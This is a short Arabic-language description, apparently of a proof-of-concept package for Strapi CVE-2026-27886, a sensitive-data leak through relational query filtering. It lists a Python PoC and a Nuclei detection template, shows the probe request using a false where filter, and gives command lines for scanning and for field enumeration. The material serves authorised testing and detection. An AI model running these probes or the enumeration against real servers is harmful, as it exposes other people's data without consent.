
Strapi CVE-2026-27886. تسريب بيانات حساسة عبر التصفية العلائقية بسبب نقص تنقية الاستعلامات
للاختبارات الأمنية المصرح بها فقط.
تسريب Strapi للبيانات الحساسة عبر التصفية العلائقية بسبب نقص تعقيم الاستعلامات.
يتضمن:
CVE-2026-27886.py - PoC بلغة PythonCVE-2026-27886.yaml - قالب Nuclei للكشفيرسل المدقق طلبين إلى نقطة نهاية مجموعة واجهة برمجة تطبيقات محتوى Strapi العامة:
GET /api/<collection>
GET /api/<collection>?where[id][$lt]=-1
إذا كان الرد الأساسي يحتوي على سجلات وكان المسند where الخاطئ يقلص مجموعة النتائج إلى صفر، فمن المحتمل أن تكون نقطة النهاية ضعيفة.
فحص آمن:
python3 CVE-2026-27886.py http://strapi/api/articles
تعداد الحقول:
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles